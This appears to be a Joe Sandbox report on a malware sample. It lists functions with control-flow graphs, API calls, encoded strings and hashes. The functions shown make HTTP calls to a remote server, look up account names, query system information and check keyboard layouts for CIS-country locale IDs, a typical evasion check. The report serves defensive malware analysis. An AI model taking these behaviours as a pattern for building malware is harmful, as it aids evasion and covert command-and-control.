GetPEB GetPEB 13597->13599 13598->13592 13599->13597 13599->13598 14004 74b7e9 14005 74b6e5 8 API calls 14004->14005 14007 74b811 Concurrency::details::_Reschedule_chore 14005->14007 14006 74b836 14009 74b648 8 API calls 14006->14009 14007->14006 14011 74cade 14007->14011 14010 74b84e 14009->14010 14012 74cafc 14011->14012 14013 74caec TpCallbackUnloadDllOnCompletion 14011->14013 14012->14006 14013->14012

                    Executed Functions

                    Function 0073BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 772 73bd60-73bdac 773 73bdb2-73bdb6 772->773 774 73c1a1-73c1c6 call 747f30 772->774 773->774 776 73bdbc-73bdc0 773->776 779 73c1f4-73c20c 774->779 780 73c1c8-73c1d4 774->780 776->774 778 73bdc6-73be4f InternetOpenW InternetConnectA call 747870 call 735b20 776->778 803 73be53-73be6f HttpOpenRequestA 778->803 804 73be51 778->804 784 73c212-73c21e 779->784 785 73c158-73c170 779->785 782 73c1d6-73c1e4 780->782 783 73c1ea-73c1f1 call 74d593 780->783 782->783 788 73c26f-73c274 call 766b9a 782->788 783->779 790 73c224-73c232 784->790 791 73c14e-73c155 call 74d593 784->791 792 73c243-73c25f call 74cf21 785->792 793 73c176-73c182 785->793 790->788 801 73c234 790->801 791->785 794 73c239-73c240 call 74d593 793->794 795 73c188-73c196 793->795 794->792 795->788 802 73c19c 795->802 801->791 802->794 810 73be71-73be80 803->810 811 73bea0-73bf0f call 747870 call 735b20 call 747870 call 735b20 803->811 804->803 812 73be82-73be90 810->812 813 73be96-73be9d call 74d593 810->813 824 73bf13-73bf29 HttpSendRequestA 811->824 825 73bf11 811->825 812->813 813->811 826 73bf2b-73bf3a 824->826 827 73bf5a-73bf82 824->827 825->824 828 73bf50-73bf57 call 74d593 826->828 829 73bf3c-73bf4a 826->829 830 73bfb3-73bfd4 InternetReadFile 827->830 831 73bf84-73bf93 827->831 828->827 829->828 832 73bfda 830->832 834 73bf95-73bfa3 831->834 835 73bfa9-73bfb0 call 74d593 831->835 836 73bfe0-73c090 call 764180 832->836 834->835 835->830
                    APIs
                    • InternetOpenW.WININET(00788D70,00000000,00000000,00000000,00000000), ref: 0073BDED
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0073BE11
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0073BE5A
                    • HttpSendRequestA.WININET(?,00000000), ref: 0073BF1B
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0073BFCD
                    • InternetCloseHandle.WININET(?), ref: 0073C0A7
                    • InternetCloseHandle.WININET(?), ref: 0073C0AF
                    • InternetCloseHandle.WININET(?), ref: 0073C0B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                    • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4y$invalid stoi argument$stoi argument out of range
                    • API String ID: 688256393-2302553812
                    • Opcode ID: b3b79aea01e953e973c123072abaec5abf904d21c520d7713e8eaa2c4b0139f8
                    • Instruction ID: a9b6958b24a607182b91818d08e7a9fc7787982692fc088f54919ce0a2df2818
                    • Opcode Fuzzy Hash: b3b79aea01e953e973c123072abaec5abf904d21c520d7713e8eaa2c4b0139f8
                    • Instruction Fuzzy Hash: 03B1E5B1600118DBEF29DF28CC84B9EBB79EF45304F5041A9F509A7293D7799AC0CB95
                    Function 007365B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1153 7365b0-736609 1227 73660a call 51601d4 1153->1227 1228 73660a call 5160234 1153->1228 1229 73660a call 5160252 1153->1229 1230 73660a call 5160282 1153->1230 1231 73660a call 51602c2 1153->1231 1232 73660a call 51602b0 1153->1232 1233 73660a call 51601f1 1153->1233 1234 73660a call 516020e 1153->1234 1235 73660a call 51602ee 1153->1235 1236 73660a call 516031a 1153->1236 1237 73660a call 51601a8 1153->1237 1238 73660a call 5160258 1153->1238 1154 73660f-736688 LookupAccountNameA call 747870 call 735b20 1160 73668a 1154->1160 1161 73668c-7366ab call 732280 1154->1161 1160->1161 1164 7366ad-7366bc 1161->1164 1165 7366dc-7366e2 1161->1165 1166 7366d2-7366d9 call 74d593 1164->1166 1167 7366be-7366cc 1164->1167 1168 7366e5-7366ea 1165->1168 1166->1165 1167->1166 1169 736907 call 766b9a 1167->1169 1168->1168 1171 7366ec-736714 call 747870 call 735b20 1168->1171 1175 73690c call 766b9a 1169->1175 1181 736716 1171->1181 1182 736718-736739 call 732280 1171->1182 1180 736911-736916 call 766b9a 1175->1180 1181->1182 1187 73673b-73674a 1182->1187 1188 73676a-73677e 1182->1188 1189 736760-736767 call 74d593 1187->1189 1190 73674c-73675a 1187->1190 1194 736784-73678a 1188->1194 1195 736828-73684c 1188->1195 1189->1188 1190->1175 1190->1189 1197 736790-7367bd call 747870 call 735b20 1194->1197 1196 736850-736855 1195->1196 1196->1196 1198 736857-7368bc call 747f30 * 2 1196->1198 1210 7367c1-7367e8 call 732280 1197->1210 1211 7367bf 1197->1211 1208 7368e9-736906 call 74cf21 1198->1208 1209 7368be-7368cd 1198->1209 1212 7368df-7368e6 call 74d593 1209->1212 1213 7368cf-7368dd 1209->1213 1220 7367ea-7367f9 1210->1220 1221 736819-73681c 1210->1221 1211->1210 1212->1208 1213->1180 1213->1212 1223 7367fb-736809 1220->1223 1224 73680f-736816 call 74d593 1220->1224 1221->1197 1222 736822 1221->1222 1222->1195 1223->1169 1223->1224 1224->1221 1227->1154 1228->1154 1229->1154 1230->1154 1231->1154 1232->1154 1233->1154 1234->1154 1235->1154 1236->1154 1237->1154 1238->1154
                    APIs
                    • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00736650
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: AccountLookupName
                    • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                    • API String ID: 1484870144-3856690409
                    • Opcode ID: 77612f40d51bcf77c3992f733a936de8807cc8b4b01afde5edf4c22381877e96
                    • Instruction ID: 2cb62d9e407c82ecf7cdb4c6eb848abe2d574d1a41f98555c1587609731ad10a
                    • Opcode Fuzzy Hash: 77612f40d51bcf77c3992f733a936de8807cc8b4b01afde5edf4c22381877e96
                    • Instruction Fuzzy Hash: 5691A5B19001189BDB28DB24CC89BDDB779EB49304F5085E9E50997283EB399FC4CFA4
                    Function 007446C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00747870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0074795C
                      • Part of subcall function 00747870: __Cnd_destroy_in_situ.LIBCPMT ref: 00747968
                      • Part of subcall function 00747870: __Mtx_destroy_in_situ.LIBCPMT ref: 00747971
                      • Part of subcall function 0073BD60: InternetOpenW.WININET(00788D70,00000000,00000000,00000000,00000000), ref: 0073BDED
                      • Part of subcall function 0073BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0073BE11
                      • Part of subcall function 0073BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0073BE5A
                    • std::_Xinvalid_argument.LIBCPMT ref: 00744EA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                    • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-y
                    • API String ID: 2414744145-1441314412
                    • Opcode ID: 518211ab260edaa9fdd49f1b7bfcceec7e09b22d4bc8d4e7f36ba44c008773e9
                    • Instruction ID: 91c74b336cdbb37bbcf48995f1808fcafc6a9414b230a2dbe585730ce06829c9
                    • Opcode Fuzzy Hash: 518211ab260edaa9fdd49f1b7bfcceec7e09b22d4bc8d4e7f36ba44c008773e9
                    • Instruction Fuzzy Hash: E4230671A00158DBEF19DB28CD8979DBB769B82304F5481D8E049AB2D3EB395F84CF52
                    Function 00735DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 927 735df0-735eee 933 735ef0-735efc 927->933 934 735f18-735f25 call 74cf21 927->934 935 735f0e-735f15 call 74d593 933->935 936 735efe-735f0c 933->936 935->934 936->935 938 735f26-7360ad call 766b9a call 74e080 call 747f30 * 5 RegOpenKeyExA 936->938 956 7360b3-736143 call 764020 938->956 957 736478-736481 938->957 983 736466-736472 956->983 984 736149-73614d 956->984 959 736483-73648e 957->959 960 7364ae-7364b7 957->960 962 736490-73649e 959->962 963 7364a4-7364ab call 74d593 959->963 964 7364e4-7364ed 960->964 965 7364b9-7364c4 960->965 962->963 970 73659e-7365a3 call 766b9a 962->970 963->960 968 73651a-736523 964->968 969 7364ef-7364fa 964->969 966 7364c6-7364d4 965->966 967 7364da-7364e1 call 74d593 965->967 966->967 966->970 967->964 977 736525-736530 968->977 978 73654c-736555 968->978 974 736510-736517 call 74d593 969->974 975 7364fc-73650a 969->975 974->968 975->970 975->974 987 736542-736549 call 74d593 977->987 988 736532-736540 977->988 980 736582-73659d call 74cf21 978->980 981 736557-736566 978->981 989 736578-73657f call 74d593 981->989 990 736568-736576 981->990 983->957 991 736153-736187 RegEnumValueW 984->991 992 736460 984->992 987->978 988->970 988->987 989->980 990->970 990->989 997 73644d-736454 991->997 998 73618d-7361ad 991->998 992->983 997->991 1002 73645a 997->1002 1004 7361b0-7361b9 998->1004 1002->992 1004->1004 1005 7361bb-73624d call 747c50 call 748090 call 747870 * 2 call 735c60 1004->1005 1005->997
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: bf64fe48f4a9c4ade0228abe305ff76cd52cfc8599a3e72b574532bb22d09bb9
                    • Instruction ID: 444cf58e86ea20b8e6e3a9dd1c4611bd77e29319527a5293c382b1b5b6f17a35
                    • Opcode Fuzzy Hash: bf64fe48f4a9c4ade0228abe305ff76cd52cfc8599a3e72b574532bb22d09bb9
                    • Instruction Fuzzy Hash: E1E16E71900218ABEB25DFA4CC8DBDEB779AB05304F5042D9E509A7292EB789FC4CF51
                    Function 00737D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1015 737d00-737d82 call 764020 1019 737d88-737db0 call 747870 call 735b20 1015->1019 1020 73827e-73829b call 74cf21 1015->1020 1027 737db2 1019->1027 1028 737db4-737dd6 call 747870 call 735b20 1019->1028 1027->1028 1033 737dda-737df3 1028->1033 1034 737dd8 1028->1034 1037 737df5-737e04 1033->1037 1038 737e24-737e4f 1033->1038 1034->1033 1039 737e06-737e14 1037->1039 1040 737e1a-737e21 call 74d593 1037->1040 1041 737e51-737e60 1038->1041 1042 737e80-737ea1 1038->1042 1039->1040 1045 73829c call 766b9a 1039->1045 1040->1038 1047 737e62-737e70 1041->1047 1048 737e76-737e7d call 74d593 1041->1048 1043 737ea3-737ea5 GetNativeSystemInfo 1042->1043 1044 737ea7-737eac 1042->1044 1049 737ead-737eb6 1043->1049 1044->1049 1056 7382a1-7382a6 call 766b9a 1045->1056 1047->1045 1047->1048 1048->1042 1054 737ed4-737ed7 1049->1054 1055 737eb8-737ebf 1049->1055 1060 73821f-738222 1054->1060 1061 737edd-737ee6 1054->1061 1058 737ec5-737ecf 1055->1058 1059 738279 1055->1059 1063 738274 1058->1063 1059->1020 1060->1059 1066 738224-73822d 1060->1066 1064 737ef9-737efc 1061->1064 1065 737ee8-737ef4 1061->1065 1063->1059 1068 737f02-737f09 1064->1068 1069 7381fc-7381fe 1064->1069 1065->1063 1070 738254-738257 1066->1070 1071 73822f-738233 1066->1071 1076 737fe9-7381e5 call 747870 call 735b20 call 747870 call 735b20 call 735c60 call 747870 call 735b20 call 735640 call 747870 call 735b20 call 747870 call 735b20 call 735c60 call 747870 call 735b20 call 735640 call 747870 call 735b20 call 747870 call 735b20 call 735c60 call 747870 call 735b20 call 735640 1068->1076 1077 737f0f-737f6b call 747870 call 735b20 call 747870 call 735b20 call 735c60 1068->1077 1074 738200-73820a 1069->1074 1075 73820c-73820f 1069->1075 1072 738265-738271 1070->1072 1073 738259-738263 1070->1073 1078 738235-73823a 1071->1078 1079 738248-738252 1071->1079 1072->1063 1073->1059 1074->1063 1075->1059 1081 738211-73821d 1075->1081 1113 7381eb-7381f4 1076->1113 1100 737f70-737f77 1077->1100 1078->1079 1083 73823c-738246 1078->1083 1079->1059 1081->1063 1083->1059 1102 737f7b-737f9b call 768a81 1100->1102 1103 737f79 1100->1103 1110 737fd2-737fd4 1102->1110 1111 737f9d-737fac 1102->1111 1103->1102 1110->1113 1114 737fda-737fe4 1110->1114 1115 737fc2-737fcf call 74d593 1111->1115 1116 737fae-737fbc 1111->1116 1113->1060 1118 7381f6 1113->1118 1114->1113 1115->1110 1116->1056 1116->1115 1118->1069
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00737EA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                    • API String ID: 1721193555-2057465332
                    • Opcode ID: 3ed605395c1b6e3f8c4db3eaed0ff9c59ffa814c8ffc1942ac4dabd2bbfc9e62
                    • Instruction ID: 1cf1a0ca86a0173f355ee6a3ba883c814136668f31a6402d425408349f975e6f
                    • Opcode Fuzzy Hash: 3ed605395c1b6e3f8c4db3eaed0ff9c59ffa814c8ffc1942ac4dabd2bbfc9e62
                    • Instruction Fuzzy Hash: 8DD1F8B1E00618EBEF24BB68DC4A39D7765AB42320F544288E4156B3D3DB3D4E81C7D2
                    Function 00766E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1239 766e01-766e36 GetFileType 1240 766eee-766ef1 1239->1240 1241 766e3c-766e47 1239->1241 1244 766ef3-766ef6 1240->1244 1245 766f1a-766f42 1240->1245 1242 766e69-766e85 call 764020 GetFileInformationByHandle 1241->1242 1243 766e49-766e5a call 767177 1241->1243 1255 766f0b-766f18 call 76740d 1242->1255 1260 766e8b-766ecd call 7670c9 call 766f71 * 3 1242->1260 1257 766f07-766f09 1243->1257 1258 766e60-766e67 1243->1258 1244->1245 1250 766ef8-766efa 1244->1250 1246 766f44-766f57 1245->1246 1247 766f5f-766f61 1245->1247 1246->1247 1262 766f59-766f5c 1246->1262 1252 766f62-766f70 call 74cf21 1247->1252 1254 766efc-766f01 call 767443 1250->1254 1250->1255 1254->1257 1255->1257 1257->1252 1258->1242 1275 766ed2-766eea call 767096 1260->1275 1262->1247 1275->1247 1278 766eec 1275->1278 1278->1257
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00766E23
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00766E7D
                    • __dosmaperr.LIBCMT ref: 00766F12
                      • Part of subcall function 00767177: __dosmaperr.LIBCMT ref: 007671AC
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID:
                    • API String ID: 2531987475-0
                    • Opcode ID: a657b7e72c503cced87977d2dfbf27031fb9b12fd67beaa1c708dc82db792c1c
                    • Instruction ID: a9664dc861eea2e85820e5b71717052783452baa331f0cd1e31ba4ed6077a920
                    • Opcode Fuzzy Hash: a657b7e72c503cced87977d2dfbf27031fb9b12fd67beaa1c708dc82db792c1c
                    • Instruction Fuzzy Hash: AE415E75900244ABCB24EFB5E8559EFBBF9EF89300B50442DF857D3211EB39A904CB61
                    Function 007382B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1375 7382b0-738331 call 764020 1379 738333-738338 1375->1379 1380 73833d-738365 call 747870 call 735b20 1375->1380 1381 73847f-73849b call 74cf21 1379->1381 1388 738367 1380->1388 1389 738369-73838b call 747870 call 735b20 1380->1389 1388->1389 1394 73838f-7383a8 1389->1394 1395 73838d 1389->1395 1398 7383aa-7383b9 1394->1398 1399 7383d9-738404 1394->1399 1395->1394 1400 7383bb-7383c9 1398->1400 1401 7383cf-7383d6 call 74d593 1398->1401 1402 738431-738452 1399->1402 1403 738406-738415 1399->1403 1400->1401 1404 73849c-7384a1 call 766b9a 1400->1404 1401->1399 1408 738454-738456 GetNativeSystemInfo 1402->1408 1409 738458-73845d 1402->1409 1406 738427-73842e call 74d593 1403->1406 1407 738417-738425 1403->1407 1406->1402 1407->1404 1407->1406 1410 73845e-738465 1408->1410 1409->1410 1410->1381 1415 738467-73846f 1410->1415 1418 738471-738476 1415->1418 1419 738478-73847b 1415->1419 1418->1381 1419->1381 1420 73847d 1419->1420 1420->1381
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 00738454
                    Memory Dump Source
                    • Source File: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true
                    • Associated: 00000005.00000002.3014298798.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014325305.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014396359.0000000000799000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A47000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A51000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3014416307.0000000000A5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015307781.0000000000A60000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015461465.0000000000C0C000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015490866.0000000000C0D000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015515557.0000000000C0E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3015542488.0000000000C0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_730000_axplong.jbxd
                    Yara matches
